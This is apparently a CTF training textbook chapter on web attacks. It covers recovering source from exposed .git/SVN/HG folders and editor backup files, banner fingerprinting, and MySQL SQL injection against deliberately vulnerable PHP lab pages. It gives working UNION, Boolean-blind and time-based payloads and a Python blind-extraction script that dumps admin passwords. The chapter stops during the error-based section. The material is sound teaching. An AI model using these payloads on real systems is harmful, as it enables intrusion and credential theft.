Web challenges are ubiquitous in traditional CTF competitions. They are easier to get started with than PWN and Reverse challenges because they do not require in-depth knowledge of operating systems or complex assembly instructions. They also demand less programming skill than Crypto and MISC challenges.

This chapter introduces some common Web vulnerabilities in CTF online competitions and, by analyzing real-world examples, gives readers a relatively comprehensive picture of them. However, the classification of Web vulnerabilities is complicated, so readers will get the most out of this book by looking up related material on the Internet while reading.

Based on the frequency and complexity of the techniques needed to solve them, we divide Web challenges into three levels: introductory, advanced, and extended. This chapter introduces each level, supplemented by real-world samples, so that readers can see how different vulnerabilities come into play when solving challenges and improve step by step. It starts from the “introductory” level with the three most common techniques for solving Web challenges: Information Gathering, SQL Injection Attack, and Arbitrary File Read Attack.

1.1 Significant “Information Gathering”

1.1.1 The Importance of Information Gathering

As the old saying goes, “Knowledge precedes victory; confusion precedes defeat.” Information gathering plays an essential role in bug hunting. In CTF online competitions, it covers a wide range of information, such as backup files, directory information, and banner information. To find vulnerabilities faster, bug hunters need to know how to gather this information and how it helps. Fortunately, a large number of mature open source scanning scripts are now available. This section covers the most common information-gathering techniques, along with useful open source tools and commercial software.

1.1.2 Classification of Information Collection

In the following sub-sections, we will discuss the basic information gathering techniques from three aspects: Sensitive Directories Leakage, Sensitive Backup Files Leakage, and Banner Identification Leakage.

1.1.2.1 Sensitive Directory Leakage

Due to careless operations, many hidden files containing sensitive information are left in directories that can be accessed remotely and anonymously. Attackers can use these files to obtain important information such as source code and the names of all files in the directory.

  1. Git leaks

【Vulnerability Introduction】 Git is a mainstream distributed version control system. It automatically generates a .git folder to store branch and version information. Developers often forget to delete the .git folder in the production environment, which allows an attacker to retrieve every version of the source code that was committed. With the source code in hand, attackers can find website vulnerabilities more easily or obtain sensitive information such as usernames, passwords, and emails.

  (1) Basic git leaks in CTF

Basic git leaks: This type of leakage requires the .git folder to have a complete file structure, and all sensitive information can be found in the latest commit. CTF players read the .git/HEAD file to find the current branch reference, read the latest commit id from that reference, and then follow git's storage format to recover the source files stored in the .git/objects/ folder. Many tools can now crawl these git objects from the .git folder and recover them automatically. We strongly recommend scrabble (https://github.com/denny0223/scrabble). It is easy to use:

./scrabble http://example.com/

Build your Web environment locally (the current directory is /var/www/html/, which is the default Web directory of Apache). See Fig. 1.1.

Fig. 1.1 Building process

Run the tool to get the source code and get the flag. See Fig. 1.2.

Fig. 1.2 Get flag
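The recovery step that tools such as scrabble automate can be sketched in a few lines. The sketch below assumes git's loose object format (a zlib-compressed stream holding a "type size" header, a NUL byte, and the content) and works on bytes that have already been downloaded; the helper names and the sample content are illustrative and are not taken from scrabble.

```python
import hashlib
import zlib


def object_path(sha1_hex: str) -> str:
    """Map a 40-character object id to its location under .git/."""
    return f".git/objects/{sha1_hex[:2]}/{sha1_hex[2:]}"


def parse_loose_object(raw: bytes) -> tuple[str, bytes]:
    """Decompress a loose object and split its header from its body."""
    data = zlib.decompress(raw)
    header, _, body = data.partition(b"\x00")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError("size in header does not match body length")
    return obj_type, body


def make_loose_blob(content: bytes) -> tuple[str, bytes]:
    """Build a blob the way git stores it; used here only to try the parser offline."""
    store = b"blob " + str(len(content)).encode() + b"\x00" + content
    return hashlib.sha1(store).hexdigest(), zlib.compress(store)


# Hypothetical file content standing in for a downloaded object.
sha, raw = make_loose_blob(b"flag{example}\n")
kind, body = parse_loose_object(raw)
```

In a real challenge, the bytes passed to parse_loose_object would come from requesting the URL built from object_path for each commit, tree, and blob id in turn.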

  (2) Git rollback leakage

As a version control system, git keeps track of every committed change. If a CTF challenge has a git leakage, the flag file may have been deleted or overwritten by a later commit, so that the latest commit no longer includes any sensitive information. Fortunately, git keeps all committed versions in the .git folder, and we can use the “git reset” command to roll back to an earlier one. Build the environment locally, as shown in Fig. 1.3.

Fig. 1.3 Building process

To exploit this type of leakage, we first use the scrabble tool to crawl .git files, and then we can use the “git reset --hard HEAD^” command to roll back to the previous version. (Note: HEAD represents current/latest version in git system, the previous version could be marked as HEAD^), see Fig. 1.4.

Fig. 1.4 Get flag

In addition to “git reset”, a more direct way to see which files each commit modified is the “git log --stat” command, followed by “git diff HEAD commit-id” to compare the current version with another one.

  (3) Git branch

Git places each commit on a timeline called a “branch”. Multiple branches let developers separate their work from the main development branch without affecting it. If no new branch is created, there is only one branch, by default called the master branch. Under most conditions, git objects can be recovered from the master branch with ease. However, the flag or sensitive files we are looking for may not exist on the master branch. The “git log” command only shows the changes on the current branch, so we need to switch to other branches to recover the target files.

Most tools that exploit git leakage do not support switching branches, so manual effort is required. Take GitHacker (https://github.com/WangYihang/GitHacker) as an example. Using it is straightforward: run the command “python GitHacker.py http://targethost:targetport/.git/”. After execution, all git files on the remote host are downloaded automatically into a local folder. Entering the folder and executing “git log --all” or “git branch -v” shows only the master branch’s information. Nonetheless, some checkout records can be found by executing the “git reflog” command, as shown in Fig. 1.5.

Fig. 1.5 The results of commands

As you can see, there is a secret branch in addition to the master branch, but the automation tool only restores the master branch, so you need to manually download the head information of the secret branch and save it to .git/refs/heads/secret (execute the command “wget http://127.0.0.1:8000/.git/refs/heads/secret”). After recovering the head information, we can reuse part of GitHacker’s code to restore the branch automatically. GitHacker’s code first downloads as many git object files as possible, then uses “git fsck” to check them, and continues to download the missing files. Here we can reuse the fixmissing function, which checks for and restores the missing files. Comment out the call to the main function and modify the code as follows.

if __name__ == "__main__":
    # main()
    baseurl = complete_url('http://127.0.0.1:8000/.git/')
    temppath = repalce_bad_chars(get_prefix(baseurl))
    fixmissing(baseurl, temppath)

After making the changes, re-execute the “python GitHacker.py” command, re-enter the generated folder, and run “git log --all” or “git branch -v”. The secret branch information is now restored. Find the corresponding commit hash in the git log and execute “git diff HEAD b94c”, where b94c is the abbreviated commit hash. A flag is captured! See Fig. 1.6.

Fig. 1.6 Get flag
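The manual step of spotting extra branches in the checkout records can also be scripted. The following is a minimal sketch that assumes the reflog has been downloaded as text (git keeps it in .git/logs/HEAD) and that branch switches are recorded with the message "checkout: moving from X to Y". The function names and the sample log are hypothetical; a name found this way may also be a commit id if a detached checkout took place.

```python
import re

# Matches the message git records in the reflog on a branch switch.
CHECKOUT = re.compile(r"checkout: moving from (\S+) to (\S+)")


def branches_in_reflog(reflog_text: str) -> list[str]:
    """Return the names seen in checkout records, in first-seen order."""
    seen: list[str] = []
    for line in reflog_text.splitlines():
        match = CHECKOUT.search(line)
        if not match:
            continue
        for name in match.groups():
            if name not in seen:
                seen.append(name)
    return seen


def ref_urls(base_url: str, branches: list[str]) -> list[str]:
    """Build the URLs of the head files that store each branch's commit id."""
    base = base_url.rstrip("/")
    return [f"{base}/refs/heads/{name}" for name in branches]


def entry(old: str, new: str, message: str) -> str:
    """Format one made-up reflog line for the offline sample below."""
    who = "player <player@example.com> 1600000000 +0800"
    return f"{old * 40} {new * 40} {who}\t{message}\n"


sample = (
    entry("0", "1", "commit (initial): init")
    + entry("1", "1", "checkout: moving from master to secret")
    + entry("1", "2", "commit: add flag")
    + entry("2", "1", "checkout: moving from secret to master")
)
found = branches_in_reflog(sample)
urls = ref_urls("http://127.0.0.1:8000/.git/", found)
```

Each URL in the result points at the head file that then has to be saved under the matching path in the local .git folder.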

  (4) Other exploits of git leaks

Besides recovering source code, a git leak can reveal other useful information. For example, the .git/config file may contain access_token information that allows access to the user's other repositories.

  2. SVN leakage

SVN (Subversion) is another version control system. An administrator might expose the hidden SVN project folder through a public service (usually a web server). Attackers can then download the .svn/entries file or the wc.db file to obtain the server source code and other information. Two excellent exploit tools are dvcs-ripper (https://github.com/kost/dvcs-ripper) and Seay-svn (a source code backup exploit tool for Windows).

  3. HG leakage

When a project is initialized, HG (Mercurial) creates a hidden .hg folder in the current folder, which contains the code and branch change history. An exploit script is available in dvcs-ripper (https://github.com/kost/dvcs-ripper).

  4. Personal experience

Readers can build on existing tools to meet their own needs. Whether the target is a hidden folder such as .git or a sensitive backend folder such as the website management platform, a robust dictionary (a list of common sensitive files and folders) is the key to finding it. dirsearch (https://github.com/maurosoria/dirsearch) is an open source web directory scanning script that ships with a default dictionary.

If accessing the .git folder in a CTF challenge returns an HTTP 403 response, try accessing the .git/HEAD or .git/config file next. If the content of the file is returned, there is a git leakage. When exploiting an SVN leakage, source code or sensitive files are usually crawled using the entries file, but sometimes the entries file is empty. If so, check whether the wc.db file exists; the checksums recorded in wc.db locate the corresponding files in the pristine folder.
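The wc.db lookup can be sketched as follows. This assumes the working copy layout used by recent Subversion versions, in which wc.db is a SQLite database whose NODES table has local_relpath and checksum columns, and in which a checksum of the form $sha1$&lt;hex&gt; corresponds to the file .svn/pristine/&lt;first two hex characters&gt;/&lt;hex&gt;.svn-base. The in-memory table and its single row are stand-ins for a downloaded wc.db, and the function names are illustrative.

```python
import sqlite3


def pristine_path(checksum: str) -> str:
    """Turn a wc.db checksum such as '$sha1$ab12...' into its pristine file path."""
    digest = checksum.split("$")[-1]
    return f".svn/pristine/{digest[:2]}/{digest}.svn-base"


def list_pristine_files(db: sqlite3.Connection) -> dict[str, str]:
    """Map each versioned file path to the pristine copy that holds its content."""
    rows = db.execute(
        "SELECT local_relpath, checksum FROM NODES WHERE checksum IS NOT NULL"
    )
    return {path: pristine_path(checksum) for path, checksum in rows}


# Stand-in for a downloaded wc.db, reduced to the two columns used here.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE NODES (local_relpath TEXT, checksum TEXT)")
db.execute(
    "INSERT INTO NODES VALUES (?, ?)",
    ("index.php", "$sha1$da39a3ee5e6b4b0d3255bfef95601890afd80709"),
)
files = list_pristine_files(db)
```

With a real wc.db, sqlite3.connect would be pointed at the downloaded file, and each path in the result would be requested from the server under the .svn folder.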

1.1.2.2 Sensitive Backup Files

With some sensitive backup files, we can get the source code of a file or the whole sitemap.

  1. gedit backup file

Under Linux, after saving with a gedit editor, a file with the suffix “~” will be created in the current directory, the contents of which will be the content of the file you just edited. If the file you just saved is named flag, then the file is named flag~, see Fig. 1.7.

Fig. 1.7 Get source

  2. vim backup file

vim is currently the most widely used Linux text editor. When a user is editing a file and vim exits abnormally (for example, the SSH connection to the server stalls because of a poor network while the file is open in vim), a backup file is left in the current directory with the following filename format.

.filename.swp

This file is used to back up the contents of the buffer, i.e., the file's contents on exit, as shown in Fig. 1.8.

Fig. 1.8 Result

For SWP backup files, we can use the “vim -r” command to restore the file’s contents. To create a test demo case, execute the “vim flag” command first and then close the terminal directly. A .flag.swp file will be generated in the current directory. To recover the SWP backup file, first create a flag file in the current directory, then use the command “vim -r flag”, you can get the contents of the file that was edited when you exited unexpectedly. See Fig. 1.9.

Fig. 1.9 Get flag

  3. Common files

Some common files can leak sensitive information. Experts have summarized these files and listed them in the dictionary files of scanning scripts. Here are some examples.

  • robots.txt: records some directory and CMS version information.

  • readme.md: records CMS version information; some even include a GitHub address.

  • www.zip/rar/tar.gz: often the source code of a website.

  4. Personal experience

Some challenge maintainers modify their challenge files online during CTF online competitions, and SWP backup files are generated due to vim’s feature. Thus players could unintentionally get source codes or sensitive messages.

The backup file generated by vim on the first abnormal exit is named *.swp, the second abnormal exit produces *.swo, and the third produces *.swn. The official vim manual also mentions backup files with names of the form *.un.filename.swp.

In addition, in a real-world environment, the backup of a website may often be a zip file named as the domain name (google.zip) or date (2021-7-1.zip).
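The naming rules in this section can be turned into a small candidate generator for a scanner's dictionary. This is a minimal sketch: the function names are illustrative, and the stems passed to archive_names are only the examples mentioned in the text.

```python
def editor_backup_names(filename: str) -> list[str]:
    """Names that gedit and vim may leave next to an edited file."""
    return [
        f"{filename}~",        # gedit backup
        f".{filename}.swp",    # vim, first abnormal exit
        f".{filename}.swo",    # vim, second abnormal exit
        f".{filename}.swn",    # vim, third abnormal exit
    ]


def archive_names(stems: list[str]) -> list[str]:
    """Combine archive stems with the suffixes mentioned in this section."""
    suffixes = ["zip", "rar", "tar.gz"]
    return [f"{stem}.{suffix}" for stem in stems for suffix in suffixes]


# Stems taken from the examples in the text: a generic name, a domain, a date.
candidates = editor_backup_names("flag") + archive_names(["www", "google", "2021-7-1"])
```

Each candidate would then be appended to the site's base URL and requested in turn.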

1.1.2.3 Banner Identification

In CTF online competitions, a website's banner information (its basic fingerprint information) plays a significant role in solving challenges, and players can often derive the solution from it. For example, if we know that the site runs on a Windows server, we can exploit an upload vulnerability in ways specific to Windows. Here are the two most common ways to identify banners.

  1. Collect your own fingerprint database

Several CMS fingerprint collections are publicly available on GitHub for readers to find, and some well-known web scanners can also identify websites.

  2. Use existing tools

We can make use of the python-Wappalyzer, which is a Python library. The demo code is listed below.

$ pip install python-Wappalyzer

>>> from Wappalyzer import Wappalyzer, WebPage
>>> wappalyzer = Wappalyzer.latest()
>>> webpage = WebPage.new_from_url('http://example.com')
>>> wappalyzer.analyze(webpage)
set([u'EdgeCast'])

The rules are stored in the apps.json file in the data directory, and readers can modify it according to their needs.

  3. Personal experience

When detecting banner information on a server, we can also try requesting arbitrary URLs; the 404 error pages and 302 redirection pages sometimes reveal information. For example, a server running ThinkPHP (a PHP web framework) with the debug option turned on displays the ThinkPHP version on error pages.

1.2 SQL Injection in CTF

During the development of web applications, many developers use databases for data storage so that content can be updated quickly. If user input is not strictly filtered, an attacker can inject attack payloads into SQL query statements, which are then passed to the back-end database for execution. As a result, the statement that is actually executed differs from the one the developer intended. This attack is known as an SQL injection attack.

Most applications put data such as passwords into the database. SQL injection attacks can leak sensitive information in the system, making it an entry-level vulnerability into the Web system. Thus, most CTF competitions take SQL injection as a challenging point, and SQL injection vulnerability is one of the most common vulnerabilities in real-world applications.

This section describes the principles, exploits, defenses, and bypass methods of SQL injection. Given the space limit and the similarity of the principles across databases, it covers only the injection attacks against MySQL that are most frequently exploited in competitions, and does not go into Access, Microsoft SQL Server, NoSQL, etc. Readers need some basic knowledge of SQL and PHP to follow this section.

1.2.1 SQL Injection Basics

SQL injection arises when developers do not strictly filter user input, so that the input affects the query and the original information in the database can be leaked, modified, or even deleted. This section uses simple examples to introduce SQL injection basics in detail, including numeric SQL injection, UNION SQL injection, character SQL injection, Boolean-blind SQL injection, time-based SQL injection, error-based SQL injection, stacked SQL injection, and the exploitation techniques that correspond to each type.

【Test Environment】 Ubuntu 16.04 (IP address: 192.168.20.133), Apache, MySQL 5.7, PHP 7.2.

1.2.1.1 Numeric SQL Injection and UNION SQL Injection

The PHP code snippet for the first example (sql1.php) is shown below (see the comments for an explanation of the code).

sql1.php

<?php
    // Connect to local MySQL with a test database.
    $conn = mysqli_connect("127.0.0.1", "root", "root", "test");
    // Query the title and content fields of the wp_news table; id is the user input value.
    $res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id=".$_GET['id']);
    // Note: SQL keywords are not case sensitive; they are uppercase here for clarity.
    // Convert the query result to an array.
    $row = mysqli_fetch_array($res);
    echo "<center>";
    // Output the value of the title field in the result.
    echo "<h1>".$row['title']."</h1>";
    echo "<br>";
    // Output the value of the content field in the result.
    echo "<h1>".$row['content']."</h1>";
    echo "</center>";
?>

The table structure of the database is shown in Fig. 1.10. The contents of the news table wp_news are shown in Fig. 1.11. The contents of the user table wp_user are shown in Fig. 1.12.

Fig. 1.10 Tables

Fig. 1.11 Contents of table wp_news

Fig. 1.12 Contents of table wp_user

The goal of this section is to turn the query on the news table into a query on the account and password columns of the user table by changing the id value passed through the HTTP GET method. The account of interest is usually the administrator's, and the password is usually stored as a hash, but here it is shown in plaintext as this_is_the_admin_password for the demonstration. The administrator’s account and password are the essential credentials of a web system; they allow an attacker to log in to the backend and control the entire web system.

Visiting http://192.168.20.133/sql1.php?id=1 gives the results shown in Fig. 1.13.

Fig. 1.13 Result

The page displays the same content as the first row (id=1) of the news table wp_news in Fig. 1.11. PHP has concatenated the id=1 passed by the GET method into the SQL query statement. The original query statement is as follows.

$res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id=". $_GET['id']);

When a request for http://192.168.20.133/sql1.php?id=1 is received, $_GET['id'] is assigned the value 1. The final query statement passed to MySQL is as follows.

SELECT title, content FROM wp_news WHERE id = 1

We can get the same result by querying directly in MySQL, see Fig. 1.14.

Fig. 1.14 Result

The contents of most websites on the Internet today are stored in databases, and the corresponding records are queried from the database through parameters such as the user’s incoming id and then displayed in the browser, such as “2” in http://192.168.20.133/sql1.php?id=2. The result is in Fig. 1.15.

Fig. 1.15 Result

The following procedure demonstrates a SQL injection attack using the id parameter entered by the user.

Visiting http://192.168.20.133/sql1.php?id=2 shows the record with id=2 from Fig. 1.11 (see Fig. 1.16). Visiting http://192.168.20.133/sql1.php?id=3-1 still shows the record with id=2 (see Fig. 1.17). This means that MySQL evaluates the expression “3-1” to 2 and then queries the record with id=2.

Fig. 1.16 Normal query

Fig. 1.17 Result

From this arithmetic behavior, we can tell that the injection point is numeric: there are no quotation marks around the input point $_GET['id'] (as the source code confirms). We can therefore append a second SELECT statement directly to pollute the original query (see Fig. 1.18 for results).

SELECT title, content FROM wp_news WHERE id = 1 UNION SELECT user, pwd FROM wp_user

Fig. 1.18 Result

The purpose of this SQL statement is to query the data in the title and content fields of the corresponding rows of the news table when id=1 and to jointly query all the contents of the user and pwd (i.e., the account password fields) in the user table.

When accessing the web application, we only need to append the injected content after the id value: http://192.168.20.133/sql1.php?id=1 union select user,pwd from wp_user. The result is shown in Fig. 1.19, where “%20” is the URL-encoded form of the space. The browser automatically URL-encodes special characters in the URI, and the server automatically decodes them when it receives the request.

Fig. 1.19 Result

However, Fig. 1.19 does not display the user and password as expected. MySQL does return two rows, but the PHP code displays only the first one, so we need to move the user and password into the first row of the result. There are several ways to do this. One is to append “limit 1,1” to the query, which skips one row and returns one row, i.e., the second row of the result (see Fig. 1.20). Another is to specify id=-1 or a very large value so that the first row in Fig. 1.18 is not returned (see Fig. 1.21), which leaves only one row (see Fig. 1.22).

Fig. 1.20 Result

Fig. 1.21 Result

Fig. 1.22 Result

Usually, the method shown in Fig. 1.22 is used to control the result rows. Accessing http://192.168.20.133/sql1.php?id=-1 union select user, pwd from wp_user gives the result shown in Fig. 1.23.

Fig. 1.23 Result

The injection approach to presenting data to a page using the UNION statement is commonly referred to as UNION (union query) injection.
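The whole numeric and UNION injection walkthrough can be reproduced offline. The sketch below makes two loud assumptions: it uses Python's built-in SQLite module as a stand-in for MySQL, and the rows of wp_news are made up because the figures are not reproduced here. Only the table names, the column names, and the admin password come from the text. The vulnerable_query function concatenates the input into the SQL text in the same way as sql1.php and returns only the first row.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript(
    """
    CREATE TABLE wp_news (id INTEGER, title TEXT, content TEXT);
    CREATE TABLE wp_user (user TEXT, pwd TEXT);
    INSERT INTO wp_news VALUES (1, 'title 1', 'content 1'), (2, 'title 2', 'content 2');
    INSERT INTO wp_user VALUES ('admin', 'this_is_the_admin_password');
    """
)


def vulnerable_query(user_id: str):
    """Concatenate input into the SQL text, as sql1.php does, and return the first row."""
    sql = "SELECT title, content FROM wp_news WHERE id=" + user_id
    return db.execute(sql).fetchone()


normal = vulnerable_query("2")        # ordinary request
computed = vulnerable_query("3-1")    # the database evaluates 3-1 before comparing
leaked = vulnerable_query("-1 union select user, pwd from wp_user")
```

Because no news row has id=-1, the only row left in the last result is the one supplied by the injected SELECT, which is why that form is preferred for controlling the displayed row.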

In the example above we already knew the database structure. How do we learn the field name pwd and the table name wp_user when testing blind?

Since version 5.0, MySQL ships with a database named information_schema, from which all database names, table names, and field names can be queried. Although this database makes it convenient to look up database information, it also makes SQL injection much easier to exploit.

Let us start with a real injection case. Assuming that we know nothing about the target database, the first step is to determine whether there is a numeric injection by checking that id=3-1 and id=2 return the same page (i.e., Fig. 1.16 is consistent with Fig. 1.17). We then use a union query to find all the table names in the database by visiting http://192.168.20.133/sql1.php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(). The results are shown in Fig. 1.24.

Fig. 1.24 Result

The table_name column of information_schema.tables holds the name of each table, and the table_schema column holds the name of the database it belongs to. The database() function returns the name of the currently selected database, and group_concat() joins the values from multiple rows with “,”. In other words, this statement queries all table names in the current database (in practice, up to a length limit) and combines them into one cell. The consistency of the results in Figs. 1.24 and 1.25 confirms that the statement works. In this way, we learn that one of the existing tables is named wp_user.

Fig. 1.25 Get the table

Similarly, the columns table and its column_name field can be used to query all column names of the wp_user table. Access http://192.168.20.133/sql1.php?id=-1 union select 1, group_concat(column_name) from information_schema.columns where table_name = 'wp_user' to get the column names, see Fig. 1.26.

Fig. 1.26 Get the column
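The two enumeration requests above follow a fixed pattern, so they are easy to generate. The helper names below are illustrative; the payload text and the target URL are the ones used in this section, and the percent-encoding is what a browser would otherwise apply automatically.

```python
from urllib.parse import quote

BASE = "http://192.168.20.133/sql1.php?id="


def tables_payload() -> str:
    """UNION payload that lists the tables of the current database."""
    return (
        "-1 union select 1,group_concat(table_name) "
        "from information_schema.tables where table_schema=database()"
    )


def columns_payload(table: str) -> str:
    """UNION payload that lists the columns of one table."""
    return (
        "-1 union select 1,group_concat(column_name) "
        f"from information_schema.columns where table_name='{table}'"
    )


def to_url(payload: str) -> str:
    """Percent-encode the payload and append it to the id parameter."""
    return BASE + quote(payload, safe="")


tables_url = to_url(tables_payload())
columns_url = to_url(columns_payload("wp_user"))
```

The number of selected columns (two here) has to match the original query, which is why a constant 1 pads the first column.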

At this point, the first example is over. The key to numeric SQL injection is to find the user input point and then use addition, subtraction, multiplication, division, etc. to judge whether the input parameter is wrapped in quotation marks in the SQL query. If it is not, the general attack methods above can be used to obtain sensitive information from the database.

1.2.1.2 Character SQL Injection and Boolean-Blind SQL Injection

The following is a simple modification of the source code of sql1.php to sql2.php, as shown below.

sql2.php

<?php
    $conn = mysqli_connect("127.0.0.1", "root", "root", "test");
    $res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id = '".$_GET['id']."'");
    $row = mysqli_fetch_array($res);
    echo "<center>";
    echo "<h1>".$row['title']."</h1>";
    echo "<br>";
    echo "<h1>".$row['content']."</h1>";
    echo "</center>";
?>

Compared to sql1.php, it wraps single quotes around the GET parameter input, making it a string to query in MySQL.

SELECT title, content FROM wp_news WHERE id = '1';

The results are shown in Fig. 1.27.

Fig. 1.27 Result

In MySQL, if the data types on the two sides of an equality comparison are inconsistent, an implicit type conversion takes place. When a number is compared with a string, the string is converted to a number before the comparison, as shown in Fig. 1.28. The string '1' is equal to the number 1; the string '1a' is converted to 1, so it is also equal to 1; the string 'a' is converted to 0, so it is equal to 0.

Fig. 1.28 Result
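The conversion rule can be approximated in a few lines, which makes it easier to predict how a quoted parameter behaves. This is a simplified emulation and not MySQL's actual implementation: it takes the longest numeric prefix of the string and falls back to 0 when there is none. The function names are illustrative.

```python
import re

# Leading numeric prefix: optional sign, digits, optional fraction and exponent.
NUMERIC_PREFIX = re.compile(r"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?")


def mysql_number(text: str) -> float:
    """Approximate how a string is turned into a number for a comparison."""
    match = NUMERIC_PREFIX.match(text)
    return float(match.group(0)) if match else 0.0


def loose_equal(number: float, text: str) -> bool:
    """Emulate `number = 'text'` with the string side converted first."""
    return number == mysql_number(text)


one_equals_1 = loose_equal(1, "1")
one_equals_1a = loose_equal(1, "1a")
zero_equals_a = loose_equal(0, "a")
```

Under this rule, a quoted value such as '3-2' is compared as 3 rather than evaluated to 1, while '2a' is compared as 2, which is the difference used to tell character injection from numeric injection.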

Following this feature, it is easy to determine whether the input point is character-based, i.e., whether it is wrapped in quotation marks (either single or double quotation marks, in most cases single quotation marks).

Visit http://192.168.20.133/sql2.php?id=3-2, and the result can be seen in Fig. 1.29. The page is empty, so we could guess it is not a number type injection but probably a character type injection. Continue trying to access http://192.168.20.133/sql2.php?id=2a, and the result could be seen in Fig. 1.30, indicating that it is indeed a character-type injection.

Fig. 1.29 Not a number type injection

Fig. 1.30 Character-type injection

Try using single quotes to close the previous single quotes, and then comment the rest of the statement with “--%20” or “%23”. Note that the input must be URL encoded, with “%20” for spaces and “%23” for “#”.
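The encoding can be checked with Python's standard library. The sketch below encodes the two comment forms and also shows why “#” has to be encoded: left as is, it starts the URL fragment, which is not part of the query string. The helper name encode_param and the fragment text "tail" are illustrative.

```python
from urllib.parse import quote, urlsplit


def encode_param(value: str) -> str:
    """Percent-encode every reserved character in a parameter value."""
    return quote(value, safe="")


hash_comment = encode_param("2'#")      # quote closed, rest commented out with '#'
dash_comment = encode_param("2'-- ")    # same idea with the '-- ' comment form

# Left unencoded, '#' begins the fragment and is cut off from the query string.
parts = urlsplit("http://192.168.20.133/sql2.php?id=2'#tail")
```

The trailing space in the second form matters, which is why it is written as “--%20” in the URL.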

Visit http://192.168.20.133/sql2.php?id=2%27%23, and the results are shown in Fig. 1.31.

Fig. 1.31 Result

The contents are successfully displayed, and the MySQL statement is now as follows.

SELECT title, content FROM wp_news WHERE id = '2'#'

The single quotation mark we entered closes the original opening quotation mark, and the “#” comments out the original query's closing quotation mark. The query is executed successfully, and the next steps are the same as for the numeric injection in Sect. 1.2.1.1. The results are shown in Fig. 1.32.

Fig. 1.32 Result

Of course, in addition to comments, you can also use single quotation marks to close the original query’s quotation mark, see Fig. 1.33.

Fig. 1.33 Use single quotation marks to close the original query’s quotation mark

Visit http://192.168.20.133/sql2.php?id=1' and '1, and the database query statement is shown in Fig. 1.34.

Fig. 1.34 Result

The expression after the keyword “WHERE” is the condition of the SELECT operation. In the previous case, “id=1” is the query condition. Here, the keyword “AND” requires two conditions to be met: (1) id='1'; (2) '1' evaluates to true. The second condition is always met because the string '1' is converted to the number 1, which counts as true. The database therefore returns the row with id=1.

Look again at the statement shown in Fig. 1.35: the first condition is still id=1, and the second condition string ‘a’ is forced to be converted to a logical false, so the condition is not satisfied and the query result is empty. When the page is displayed as usual, it could prove that condition after AND is true, and when the page is displayed as empty, the condition after AND is false. Although we do not see the data directly, we can infer the data by injection, a technique known as Boolean-blind-type SQL injection.

Fig. 1.35 Result

Here are the technical details of Boolean-blind SQL injection. Suppose the sensitive data is a single byte. First test whether it is 'a': if it is, the page displays the id=1 record (because the first condition also holds); otherwise, the page is blank. For example, if the character to be guessed is 'f', visiting http://192.168.20.133/sql2.php?id=1' and sensitive_data='a' fails, and so do the guesses 'b', 'c', 'd', and 'e'. Only when we try 'f' does the page display the id=1 record. See the result in Fig. 1.36.

Fig. 1.36 Result

Of course, guessing one value at a time is too slow. We can use a comparison operator such as “<” to guess characters by range. Visiting http://192.168.20.133/sql2.php?id=1' and sensitive_data < 'n' quickly tells us whether the ASCII code of the character being guessed is less than that of 'n', and a binary search then narrows down the character.

The case above involves a single character, but most data in a real database is longer than that, so how do we get every byte of the data? The answer is to use MySQL’s built-in substring functions, such as substring(), mid(), and substr(), see Fig. 1.37.

Fig. 1.37 Result

The principle of Boolean-blind-type SQL injection has been briefly described above, so let us use it to get the password for admin. Query in MySQL (see Fig. 1.38 for results).

SELECT concat(user, 0x7e, pwd) FROM wp_user

Fig. 1.38 Result

Then extract the first byte of the data (see Fig. 1.39 for results).

SELECT MID((SELECT concat(user, 0x7e, pwd) FROM wp_user), 1, 1)

Fig. 1.39 Result

So the complete exploit SQL query is as follows.

SELECT title, content FROM wp_news WHERE id = '1' AND (SELECT MID((SELECT concat(user, 0x7e, pwd) FROM wp_user), 1, 1)) = 'a'

Visit http://192.168.20.133/sql2.php?id=1' and(select mid((select concat(user,0x7e,pwd) from wp_user),1,1))='a'%23; the result is shown in Fig. 1.40. To extract the second byte, visit http://192.168.20.133/sql2.php?id=1' and(select mid((select concat(user,0x7e,pwd) from wp_user),2,1))='d'%23. The result is consistent with Fig. 1.40, which shows that the second character is 'd'. The remaining bytes can be obtained in the same way.

Fig. 1.40 Result
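Combining the byte-by-byte extraction with the range comparison gives an automated loop. The following is a minimal sketch under stated assumptions: the comparison uses MySQL's ascii() function, which is not used in the examples above, and the HTTP request is replaced by a local oracle so that the search logic can be tried offline. In a real attack, is_greater would send the payload built by build_payload and report whether the page shows the id=1 record. All function names are illustrative.

```python
from typing import Callable

TEMPLATE = (
    "1' and ascii(mid((select concat(user,0x7e,pwd) from wp_user),{pos},1))>{code}#"
)


def build_payload(pos: int, code: int) -> str:
    """Payload asking whether the character at `pos` has a code above `code`."""
    return TEMPLATE.format(pos=pos, code=code)


def extract(is_greater: Callable[[int, int], bool], max_len: int = 64) -> str:
    """Recover a string one character at a time with binary search."""
    result = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 127          # code 0 means we are past the end of the data
        while low < high:
            mid = (low + high) // 2
            if is_greater(pos, mid):
                low = mid + 1
            else:
                high = mid
        if low == 0:
            break
        result += chr(low)
    return result


def make_local_oracle(secret: str) -> Callable[[int, int], bool]:
    """Offline stand-in for 'the page shows the id=1 record'."""
    def is_greater(pos: int, code: int) -> bool:
        value = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return value > code
    return is_greater


recovered = extract(make_local_oracle("admin~this_is_the_admin_password"))
```

Each character costs seven requests with this search range, compared with up to dozens when every candidate is tried in turn.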

In blind SQL injection, sensitive data is usually inferred from differences in the page responses. In some cases, the page response does not change, so the result of the injection must be determined in other ways, such as a time delay, which can be seen in Fig. 1.41. By increasing the argument of the sleep() function, we can lengthen the delay to make sure that it is caused by the injection and not by normal query processing. Unlike Boolean-blind injection, which reads the result from the page content, this technique combines sleep() with the short-circuit behavior of the IF statement or the AND/OR keywords and uses the execution time of the SQL query to determine the result, which is known as time-blind injection. Its attack structure is similar to that of the Boolean-blind type, so no further examples are given here.

Fig. 1.41 Result

1.2.1.3 Error-Type SQL Injection

Sometimes, to make debugging easier for developers, websites enable error messages. The demo code snippet is shown in sql3.php.

sql3.php

<?php
    $conn = mysqli_connect("127.0.0.1", "root", "root", "test");
